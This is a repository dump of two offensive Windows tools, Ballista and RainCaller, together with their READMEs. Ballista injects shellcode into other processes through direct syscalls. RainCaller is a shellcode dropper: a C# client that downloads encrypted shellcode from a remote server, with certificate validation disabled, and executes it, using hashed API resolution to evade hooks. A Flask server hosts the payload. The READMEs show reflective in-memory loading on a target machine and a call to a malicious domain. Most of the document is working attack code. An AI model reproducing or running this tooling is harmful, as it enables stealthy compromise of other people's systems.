74 | 75 | PS C:\Users\tester> [System.Reflection.Assembly]::LoadFile("C:\Users\tester\Ballista.exe") 76 | 77 | GAC Version Location 78 | --- ------- -------- 79 | False v4.0.30319 C:\Users\tester\Ballista.exe 80 | 81 | PS C:\Users\tester> [Ballista.Ballista]::Shoot("WV4CAxsSHxMIX0cgBShaJysd...", "Key") 82 | ``` 83 | 84 | Alternatively, one can Base64 encode (or obfuscate / encrypt) the binary on a local machine: 85 | ```powershell 86 | PS C:\Users\tester> $dll = [System.IO.File]::ReadAllBytes("C:\Users\tester\Ballista.exe") 87 | PS C:\Users\tester> [System.Convert]::ToBase64String($dll) 88 | TVqQAAMAAAAEAAAA//8AA... 89 | ``` 90 | 91 | And afterwards load it on a target machine in the following way: 92 | 93 | ```powershell 94 | PS C:\Users\tester> [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AA...")) 95 | 96 | GAC Version Location 97 | --- ------- -------- 98 | False v4.0.30319 99 | 100 | PS C:\Users\tester> [Ballista.Ballista]::Shoot("WV4CAxsSHxMIX0cgBShaJysd...", "Key") 101 | ``` -------------------------------------------------------------------------------- /Ballista/Ballista/Ballista.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | using static Ballista.Native; 5 | using static Ballista.Syscalls; 6 | using static Ballista.Releases; 7 | 8 | namespace Ballista 9 | { 10 | public class Ballista 11 | { 12 | private static string XOR(string text, string key) 13 | { 14 | var result = new System.Text.StringBuilder(); 15 | 16 | for (int c = 0; c < text.Length; c++) 17 | result.Append((char)((uint)text[c] ^ (uint)key[c % key.Length])); 18 | 19 | return result.ToString(); 20 | } 21 | 22 | static void __Shoot(string[] args) 23 | { 24 | if ( 25 | args.Length == 3 && Int32.TryParse(args[0], out int release) && 26 | release >= 1 && release <= syscallOffsets.Count 27 | ) 28 | { 29 | 30 | UInt32 size = 4096, 31 | sectionSize = 
size; 32 | 33 | IntPtr sectionHandle = IntPtr.Zero, 34 | localSectionAddress = IntPtr.Zero, 35 | remoteSectionAddress = IntPtr.Zero; 36 | 37 | ulong sectionOffset = 0; 38 | 39 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 40 | var currProcHandle = currProc.Handle; 41 | var currProcSessionId = currProc.SessionId; 42 | 43 | NtCreateSection(release, ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 44 | NtMapViewOfSection(release, sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 45 | if (localSectionAddress != IntPtr.Zero) 46 | { 47 | int tPid = -1; 48 | 49 | if (Int32.TryParse(args[1], out int _pid)) //If parsing fails user provided a string (process name instead of a PID) 50 | tPid = _pid; 51 | else { 52 | var processes = System.Diagnostics.Process.GetProcessesByName(args[1].Replace(".exe", string.Empty)); //Strip .exe if it's in the process name 53 | 54 | if (processes.Length >= 1) 55 | { 56 | foreach(System.Diagnostics.Process proc in processes) 57 | { 58 | if(proc.SessionId == currProcSessionId) 59 | { 60 | tPid = proc.Id; 61 | break; 62 | } 63 | } 64 | } 65 | } 66 | 67 | if (tPid >= 0) 68 | { 69 | var tClientId = new CLIENT_ID(); 70 | tClientId.UniqueProcess = new IntPtr(tPid); 71 | tClientId.UniqueThread = IntPtr.Zero; 72 | 73 | var tObjAttr = new OBJECT_ATTRIBUTES(); 74 | 75 | IntPtr tHandle = IntPtr.Zero; 76 | if (NtOpenProcess(release, ref tHandle, GENERIC_WRITE, ref tObjAttr, ref tClientId) == NTSTATUS.Success) 77 | { 78 | NtMapViewOfSection(release, sectionHandle, tHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 79 | 80 | byte[] b64 = Convert.FromBase64String(args[2]); 81 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 82 | 83 | IntPtr targetThreadHandle = 
IntPtr.Zero; 84 | NtCreateThreadEx(release, ref targetThreadHandle, GENERIC_WRITE, IntPtr.Zero, tHandle, remoteSectionAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); 85 | } 86 | else 87 | Console.WriteLine("\nFailed to open target process."); 88 | } 89 | else 90 | Console.WriteLine("\nNo such process exists for the current user."); 91 | } 92 | else 93 | Console.WriteLine("\nFailed, most probably due to invalid release."); 94 | } 95 | else 96 | Console.WriteLine("\nArg error."); 97 | } 98 | 99 | public static void Shoot(string arg, string key) 100 | { 101 | __Shoot(XOR(System.Text.Encoding.Default.GetString(Convert.FromBase64String(arg)), key).Split(';')); 102 | } 103 | 104 | static void Main(string[] args) 105 | { 106 | __Shoot(args); 107 | } 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/RainCaller.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | using System.Diagnostics; 6 | using System.Text; 7 | 8 | using static RainCaller.Native; 9 | 10 | namespace RainCaller 11 | { 12 | public class RainCaller 13 | { 14 | //Override the default WebClient class -> setup a 5 second timeout 15 | //hxxps://stackoverflow.com/questions/1789627/how-to-change-the-timeout-on-a-net-webclient-object 16 | private class __WebClient : WebClient 17 | { 18 | protected override WebRequest GetWebRequest(Uri uri) 19 | { 20 | WebRequest w = base.GetWebRequest(uri); 21 | w.Timeout = 5000; 22 | return w; 23 | } 24 | } 25 | 26 | //hxxps://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 27 | private static byte[] RC4Crypt(byte[] pwd, byte[] data) 28 | { 29 | int a, i, j, k, tmp; 30 | int[] key, box; 31 | byte[] cipher; 32 | 33 | key = new int[256]; 34 | box = new int[256]; 35 | cipher = new byte[data.Length]; 36 | 37 | for (i = 0; i < 256; i++) 38 | { 39 | key[i] = pwd[i % 
pwd.Length]; 40 | box[i] = i; 41 | } 42 | for (j = i = 0; i < 256; i++) 43 | { 44 | j = (j + box[i] + key[i]) % 256; 45 | tmp = box[i]; 46 | box[i] = box[j]; 47 | box[j] = tmp; 48 | } 49 | for (a = j = i = 0; i < data.Length; i++) 50 | { 51 | a++; 52 | a %= 256; 53 | j += box[a]; 54 | j %= 256; 55 | tmp = box[a]; 56 | box[a] = box[j]; 57 | box[j] = tmp; 58 | k = box[((box[a] + box[j]) % 256)]; 59 | cipher[i] = (byte)(data[i] ^ k); 60 | } 61 | return cipher; 62 | } 63 | 64 | private static byte[] RetrieveShellcode(string uri) 65 | { 66 | byte[] r = new byte[0]; 67 | 68 | System.Net.ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => true; 69 | ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; 70 | 71 | using (var client = new __WebClient()) 72 | { 73 | client.Headers.Add("Acce" + "pt-E" + "nco" + "di" + "ng", "gzi" + "p, de" + "fla" + "t" + "e"); 74 | client.Headers.Add(HttpRequestHeader.Cookie, "CON" + "SE" + "NT=Y" + "ES"); //IOC 75 | try 76 | { 77 | using (Stream data = client.OpenRead(uri)) 78 | using (var shellcode = new MemoryStream()) 79 | { 80 | data.CopyTo(shellcode); 81 | r = shellcode.ToArray(); 82 | } 83 | } 84 | catch 85 | { 86 | Console.WriteLine("Failed to retrieve shellcode."); 87 | System.Environment.Exit(-1); 88 | } 89 | } 90 | 91 | return r; 92 | } 93 | 94 | private static void Inject(byte[] _sc, string Rc4Key) 95 | { 96 | byte[] sc = RC4Crypt(Encoding.UTF8.GetBytes(Rc4Key), _sc); 97 | 98 | IntPtr scMem = Native.VirtualAlloc(IntPtr.Zero, (uint)sc.Length, Native.MEM_COMMIT, Native.PAGE_EXECUTE_READWRITE); 99 | if (scMem != IntPtr.Zero) 100 | { 101 | var bW = new IntPtr(); 102 | if (Native.WriteProcessMemory(Process.GetCurrentProcess().Handle, scMem, sc, sc.Length, out bW)) 103 | { 104 | if (Native.QueueUserAPC(scMem, GetCurrentThread(), IntPtr.Zero) > 0) 105 | { 106 | Native.NtTestAlert(); 107 | 108 | uint oP = 0; 109 | if (!Native.VirtualProtect(scMem, new 
UIntPtr((uint)sc.Length), Native.PAGE_READWRITE, out oP)) 110 | Console.WriteLine("Failed to restore the memory region back to RW permissions."); 111 | } 112 | else 113 | Console.WriteLine("Failed to QueueUserAPC."); 114 | } 115 | else 116 | Console.WriteLine("Failed to write shellcode to the memory region."); 117 | } 118 | else 119 | Console.WriteLine("Failed to allocate RWX memory."); 120 | 121 | } 122 | public static void Drop(string uri, string key) 123 | { 124 | Inject(RetrieveShellcode(uri), key); 125 | } 126 | static void Main(string[] args) 127 | { 128 | if (args.Length == 2) 129 | Drop(args[0], args[1]); 130 | else 131 | Console.WriteLine("RainCaller.exe "); 132 | } 133 | } 134 | } 135 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace RainCaller 6 | { 7 | class Native 8 | { 9 | public struct Delegates 10 | { 11 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 12 | public delegate IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 13 | 14 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 15 | public delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 16 | 17 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 18 | public delegate bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 19 | 20 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 21 | public delegate IntPtr GetCurrentThread(); 22 | 23 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 24 | public delegate UInt32 QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 27 | public 
delegate uint NtTestAlert(); 28 | } 29 | 30 | /* 31 | Console.WriteLine("VirtualAlloc: " + GetAPIHash("VirtualAlloc", 0x489c71c8)); 32 | Console.WriteLine("VirtualProtect: " + GetAPIHash("VirtualProtect", 0xff8af7dabc78a4c)); 33 | Console.WriteLine("WriteProcessMemory: " + GetAPIHash("WriteProcessMemory", 0x98c7acfaaa7)); 34 | Console.WriteLine("GetCurrentThread: " + GetAPIHash("GetCurrentThread", 0x81b66d18ff2)); 35 | Console.WriteLine("QueueUserAPC: " + GetAPIHash("QueueUserAPC", 0x78c1c8a2df)); 36 | 37 | VirtualAlloc: 765A35D4990A44EBFFA58ED9D11FCB3A - 0x489c71c8 38 | VirtualProtect: 36E630C1E245C34C48C49996DDD800D7 - 0xff8af7dabc78a4c 39 | WriteProcessMemory: E9875FBBAB315FCF2A085F380E111E78 - 0x98c7acfaaa7 40 | GetCurrentThread: 4AC373A2A9DDC9C64488A9002BD01E19 - 0x81b66d18ff2 41 | QueueUserAPC: 8F31B496099C60DB7B16BEEB10300365 - 0x78c1c8a2df 42 | NtTestAlert: 9830A80D786E0546B6E7D87F01C58C48 - 0x0450fad035012 43 | */ 44 | 45 | //Obfuscation 46 | private static Encoding encoding = Encoding.UTF8; 47 | private static byte[] k32Enc = new byte[] { 0x6B, 0x65, 0x72, 0x6E, 0x65, 0x6C, 0x33, 0x32, 0x2E, 0x64, 0x6C, 0x6C }; //"kernel32.dll" 48 | private static byte[] ntdllEnc = new byte[] { 0x6E, 0x74, 0x64, 0x6C, 0x6C, 0x2E, 0x64, 0x6C, 0x6C }; //ntdll.dll 49 | public static IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect) 50 | { 51 | object[] funcargs = { lpAddress, dwSize, flAllocationType, flProtect }; 52 | return (IntPtr)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "765A35D4990A44EBFFA58ED9D11FCB3A", 0x489c71c8, typeof(Delegates.VirtualAlloc), ref funcargs); 53 | } 54 | 55 | public static bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect) 56 | { 57 | lpflOldProtect = 0; 58 | object[] funcargs = { lpAddress, dwSize, flNewProtect, lpflOldProtect }; 59 | 60 | return (bool)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "36E630C1E245C34C48C49996DDD800D7", 
0xff8af7dabc78a4c, typeof(Delegates.VirtualProtect), ref funcargs); 61 | } 62 | 63 | public static bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten) 64 | { 65 | lpNumberOfBytesWritten = new IntPtr(); 66 | object[] funcargs = { hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten }; 67 | 68 | return (bool)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "E9875FBBAB315FCF2A085F380E111E78", 0x98c7acfaaa7, typeof(Delegates.WriteProcessMemory), ref funcargs); 69 | } 70 | 71 | public static IntPtr GetCurrentThread() 72 | { 73 | object[] funcargs = { }; 74 | 75 | return (IntPtr)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "4AC373A2A9DDC9C64488A9002BD01E19", 0x81b66d18ff2, typeof(Delegates.GetCurrentThread), ref funcargs); 76 | } 77 | 78 | public static UInt32 QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData) 79 | { 80 | object[] funcargs = { pfnAPC, hThread, dwData }; 81 | 82 | return (UInt32)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "8F31B496099C60DB7B16BEEB10300365", 0x78c1c8a2df, typeof(Delegates.QueueUserAPC), ref funcargs); 83 | } 84 | 85 | public static uint NtTestAlert() 86 | { 87 | object[] funcargs = { }; 88 | 89 | return (uint)DInvoke.DynamicAPIInvoke(encoding.GetString(ntdllEnc), "9830A80D786E0546B6E7D87F01C58C48", 0x0450fad035012, typeof(Delegates.NtTestAlert), ref funcargs); 90 | } 91 | 92 | public static uint MEM_COMMIT = 0x1000, 93 | PAGE_EXECUTE_READWRITE = 0x40, 94 | PAGE_READWRITE = 0x04; 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /RainCaller/README.md: -------------------------------------------------------------------------------- 1 | # RainCaller 2 | **RainCaller** is a shellcode dropper suite consisting of a *Python3* webserver (server) and a *C#* dropper (client). 3 | 4 | *** 5 | 6 | ## Server 7 | The server is located in the */Server* folder. 
8 | 9 | ### Installation 10 | The server-side part of **RainCaller** has some *Python3* dependencies noted down in the `requirements.txt` file. These can be installed with *pip3*: 11 | ``` 12 | tester@dev:~$ pip3 install -r requirements.txt 13 | Collecting Flask 14 | Downloading Flask-2.0.1-py3-none-any.whl (94 kB) 15 | |████████████████████████████████| 94 kB 1.0 MB/s 16 | ... 17 | ``` 18 | 19 | ### Usage 20 | ``` 21 | tester@dev:~$ python3 main.py 22 | 23 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 24 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 25 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 26 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 27 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 28 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 29 | @v1.1 30 | 31 | usage: main.py [-h] -a ADDRESS -p PORT -u URI -f FILE -k KEY [--ssl_key SSL_KEY] [--ssl_crt SSL_CRT] 32 | main.py: error: the following arguments are required: -a/--address, -p/--port, -u/--uri, -f/--file, -k/--key 33 | ``` 34 | | Argument | Description | 35 | | ----------- | ----------- | 36 | | ADDRESS | What address to listen on (`0.0.0.0`, `127.0.0.1` ...) 
| 37 | | PORT | What port to listen on | 38 | | URI | What URI should the shellcode be retrievable from | 39 | | FILE | Path to a file containing unencrypted shellcode in a binary format | 40 | | KEY | Key used to RC4 encrypt the shellcode obtained from the FILE parameter | 41 | | SSL_KEY | Optional path to an SSL key (PEM format) if TLS/SSL is to be used | 42 | | SSL_CRT | Optional path to an SSL certificate (PEM format) if TLS/SSL is to be used | 43 | 44 | ### Example 45 | ``` 46 | tester@dev:~$ sudo python3 main.py -a 0.0.0.0 -p 443 -u /download -f calc_x64_sc.bin -k HelloWorld --ssl_key key.pem --ssl_crt cert.pem 47 | 48 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 49 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 50 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 51 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 52 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 53 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 54 | @v1.1 55 | 56 | [*]> Starting the server thread... 57 | * Serving Flask app 'main' (lazy loading) 58 | * Environment: production 59 | WARNING: This is a development server. Do not use it in a production deployment. 60 | Use a production WSGI server instead. 61 | * Debug mode: off 62 | [+]> Done. 63 | ... 64 | ``` 65 | In other words, start a listener on the global interface on port `443`. Read shellcode from the `calc_x64_sc.bin` file, encrypt it with the string `HelloWorld` and serve it on the `/download` URI. Use the optional SSL/TLS configuration where `key.pem` and `cert.pem` are valid paths to the corresponding TLS/SSL files. 66 | 67 | *** 68 | 69 | ## Client 70 | The client is located in the */Client* folder. To compile the client, open the solution in *Visual Studio* and target the release build against `.NET Framework 4.0` or `.NET Framework 4.5`. 
71 | 72 | ### Usage (Normal) 73 | ``` 74 | C:\Users\Public\Documents\>RainCaller.exe 75 | RainCaller.exe 76 | ``` 77 | | Argument | Description | 78 | | ----------- | ----------- | 79 | | uri | URL to the remote endpoint which serves the shellcode | 80 | | enc_key | Key which the shellcode was encrypted with (used for decryption) | 81 | 82 | 83 | ### Usage (Reflection) 84 | **RainCaller** can be easily reflected into memory: 85 | ```powershell 86 | PS C:\Users\tester> [System.Reflection.Assembly]::LoadFile("C:\Users\tester\RainCaller.exe") 87 | 88 | GAC Version Location 89 | --- ------- -------- 90 | False v4.0.30319 C:\Users\tester\RainCaller.exe 91 | 92 | PS C:\Users\tester> [RainCaller.RainCaller]::Drop("hxxps://maldomain.local/shellcode", "shellcodeEncKey") 93 | ``` 94 | Alternatively, one can Base64 encode (or obfuscate / encrypt) the binary on a local machine: 95 | ```powershell 96 | PS C:\Users\tester> $dll = [System.IO.File]::ReadAllBytes("C:\Users\tester\RainCaller.exe") 97 | PS C:\Users\tester> [System.Convert]::ToBase64String($dll) 98 | TVqQAAMAAAAEAAAA//8AA... 
99 | ``` 100 | And afterwards load it on a target machine in the following way: 101 | ```powershell 102 | PS C:\Users\tester> [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AA...")) 103 | 104 | GAC Version Location 105 | --- ------- -------- 106 | False v4.0.30319 107 | 108 | PS C:\Users\tester> [RainCaller.RainCaller]::Drop("hxxps://maldomain.local/shellcode", "shellcodeEncKey") 109 | ``` 110 | -------------------------------------------------------------------------------- /Ballista/Ballista/Releases.cs: -------------------------------------------------------------------------------- 1 | using System.Collections.Generic; 2 | 3 | namespace Ballista 4 | { 5 | class Releases 6 | { 7 | public static Dictionary> syscallOffsets = new Dictionary>() 8 | { 9 | //Parts of the dictionary taken from badBounty/directInjectorPOC 10 | 11 | /* Windows 10 */ 12 | { 1, new Dictionary() //W10-20H2, WS-2019 13 | { 14 | { "NtOpenProcess", 0x26}, 15 | { "NtCreateThreadEx", 0xC1}, 16 | { "NtCreateSection", 0x4A}, 17 | { "NtMapViewOfSection", 0x28} 18 | } 19 | }, 20 | { 2, new Dictionary() //W10-2004, WS-2019 21 | { 22 | { "NtOpenProcess", 0x26}, 23 | { "NtCreateThreadEx", 0xC1}, 24 | { "NtCreateSection", 0x4A}, 25 | { "NtMapViewOfSection", 0x28} 26 | } 27 | }, 28 | { 3, new Dictionary() //W10-1909, WS-2019 29 | { 30 | { "NtOpenProcess", 0x26}, 31 | { "NtCreateThreadEx", 0xBD}, 32 | { "NtCreateSection", 0x4A}, 33 | { "NtMapViewOfSection", 0x28} 34 | } 35 | }, 36 | { 4, new Dictionary() //W10-1903, WS-2019 37 | { 38 | { "NtOpenProcess", 0x26}, 39 | { "NtCreateThreadEx", 0xBD}, 40 | { "NtCreateSection", 0x4A}, 41 | { "NtMapViewOfSection", 0x28} 42 | } 43 | }, 44 | { 5, new Dictionary() //W10-1809, WS-2019 45 | { 46 | { "NtOpenProcess", 0x26}, 47 | { "NtCreateThreadEx", 0xBC}, 48 | { "NtCreateSection", 0x4A}, 49 | { "NtMapViewOfSection", 0x28} 50 | } 51 | }, 52 | { 6, new Dictionary() //W10-1803 53 | { 54 | { "NtOpenProcess", 0x26}, 55 | { 
"NtCreateThreadEx", 0xBB}, 56 | { "NtCreateSection", 0x4A}, 57 | { "NtMapViewOfSection", 0x28} 58 | } 59 | }, 60 | { 7, new Dictionary() //W10-1709 61 | { 62 | { "NtOpenProcess", 0x26}, 63 | { "NtCreateThreadEx", 0xBA}, 64 | { "NtCreateSection", 0x4A}, 65 | { "NtMapViewOfSection", 0x28} 66 | } 67 | }, 68 | { 8, new Dictionary() //W10-1703 69 | { 70 | { "NtOpenProcess", 0x26}, 71 | { "NtCreateThreadEx", 0xB9}, 72 | { "NtCreateSection", 0x4A}, 73 | { "NtMapViewOfSection", 0x28} 74 | } 75 | }, 76 | { 9, new Dictionary() //W10-1607, WS-2016 77 | { 78 | { "NtOpenProcess", 0x26}, 79 | { "NtCreateThreadEx", 0xB6}, 80 | { "NtCreateSection", 0x4A}, 81 | { "NtMapViewOfSection", 0x28} 82 | } 83 | }, 84 | { 10, new Dictionary() //W10-1511, WS-2016 85 | { 86 | { "NtOpenProcess", 0x26}, 87 | { "NtCreateThreadEx", 0xB4}, 88 | { "NtCreateSection", 0x4A}, 89 | { "NtMapViewOfSection", 0x28} 90 | } 91 | }, 92 | { 11, new Dictionary() //W10-1507, WS-2016 93 | { 94 | { "NtOpenProcess", 0x26}, 95 | { "NtCreateThreadEx", 0xB3}, 96 | { "NtCreateSection", 0x4A}, 97 | { "NtMapViewOfSection", 0x28} 98 | } 99 | }, 100 | 101 | /* Windows 7 */ 102 | { 12, new Dictionary() //W7-SP1 + SP0 103 | { 104 | { "NtOpenProcess", 0x23}, 105 | { "NtCreateThreadEx", 0xA5}, 106 | { "NtCreateSection", 0x47}, 107 | { "NtMapViewOfSection", 0x25} 108 | } 109 | }, 110 | 111 | /* Windows Server 2012 */ 112 | { 13, new Dictionary() //WS2012-R2 113 | { 114 | { "NtOpenProcess", 0x25}, 115 | { "NtCreateThreadEx", 0xB0}, 116 | { "NtCreateSection", 0x49}, 117 | { "NtMapViewOfSection", 0x27} 118 | } 119 | }, 120 | { 14, new Dictionary() //WS2012-SP0 121 | { 122 | { "NtOpenProcess", 0x24}, 123 | { "NtCreateThreadEx", 0xAF}, 124 | { "NtCreateSection", 0x48}, 125 | { "NtMapViewOfSection", 0x26} 126 | } 127 | }, 128 | }; 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/DInvoke.cs: 
-------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Text; 5 | using System.Security.Cryptography; 6 | 7 | namespace RainCaller 8 | { 9 | class DInvoke 10 | { 11 | /* Sources: 12 | * https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Execution/DynamicInvoke 13 | * https://thewover.github.io/Dynamic-Invoke/ 14 | * https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/ 15 | */ 16 | public static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters) 17 | { 18 | Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType); 19 | return funcDelegate.DynamicInvoke(Parameters); 20 | } 21 | public static IntPtr GetLoadedModuleAddress(string DLLName) 22 | { 23 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 24 | foreach (ProcessModule Mod in ProcModules) 25 | { 26 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 27 | { 28 | return Mod.BaseAddress; 29 | } 30 | } 31 | 32 | return IntPtr.Zero; 33 | } 34 | public static object DynamicAPIInvoke(string DLLName, string FunctionHash, long HashKey, Type FunctionDelegateType, ref object[] Parameters) 35 | { 36 | return DynamicFunctionInvoke(GetLibraryAddress(DLLName, FunctionHash, HashKey), FunctionDelegateType, ref Parameters); 37 | } 38 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionHash, long Key, bool CanLoadFromDisk = false) 39 | { 40 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 41 | if (hModule == IntPtr.Zero) 42 | { 43 | throw new DllNotFoundException(DLLName + " could not be found."); 44 | } 45 | 46 | return GetExportAddress(hModule, FunctionHash, Key); 47 | } 48 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string FunctionHash, long Key) 49 | { 50 | IntPtr FunctionPtr = IntPtr.Zero; 51 | try 
52 | { 53 | // Traverse the PE header in memory 54 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 55 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 56 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 57 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 58 | Int64 pExport = 0; 59 | if (Magic == 0x010b) 60 | { 61 | pExport = OptHeader + 0x60; 62 | } 63 | else 64 | { 65 | pExport = OptHeader + 0x70; 66 | } 67 | 68 | // Read -> IMAGE_EXPORT_DIRECTORY 69 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 70 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 71 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 72 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 73 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 74 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 75 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 76 | 77 | // Loop the array of export name RVA's 78 | for (int i = 0; i < NumberOfNames; i++) 79 | { 80 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 81 | if (GetAPIHash(FunctionName, Key).Equals(FunctionHash, StringComparison.OrdinalIgnoreCase)) 82 | { 83 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 84 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 85 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 86 | break; 87 | } 88 | } 89 | } 90 | catch 91 | { 92 | // Catch parser failure 93 | throw new InvalidOperationException("Failed to parse exports."); 94 
| } 95 | 96 | if (FunctionPtr == IntPtr.Zero) 97 | { 98 | // Export not found 99 | throw new MissingMethodException(FunctionHash + "export hash could not be found."); 100 | } 101 | return FunctionPtr; 102 | } 103 | 104 | //Helper function to convert a function name to a function hash. 105 | public static string GetAPIHash(string APIName, long Key) 106 | { 107 | byte[] data = Encoding.UTF8.GetBytes(APIName.ToLower()); 108 | byte[] kbytes = BitConverter.GetBytes(Key); 109 | 110 | using (HMACMD5 hmac = new HMACMD5(kbytes)) 111 | { 112 | byte[] bHash = hmac.ComputeHash(data); 113 | return BitConverter.ToString(bHash).Replace("-", ""); 114 | } 115 | } 116 | } 117 | } 118 | -------------------------------------------------------------------------------- /RainCaller/Server/main.py: -------------------------------------------------------------------------------- 1 | import os, threading, argparse, logging, signal 2 | 3 | from flask import Flask, send_file, redirect, request 4 | from time import sleep 5 | from Crypto.Cipher import ARC4 6 | 7 | ENC_FILE_NAME = 'dropper_sc_enc.bin' #Name of the file containing RC4 encrypted shellcode 8 | INVALID_REDIR = 'https://google.com' #URL of a website where invalid requests are redirected to 9 | ANSI_RED = '\033[91m' 10 | ANSI_ORNG = '\033[93m' 11 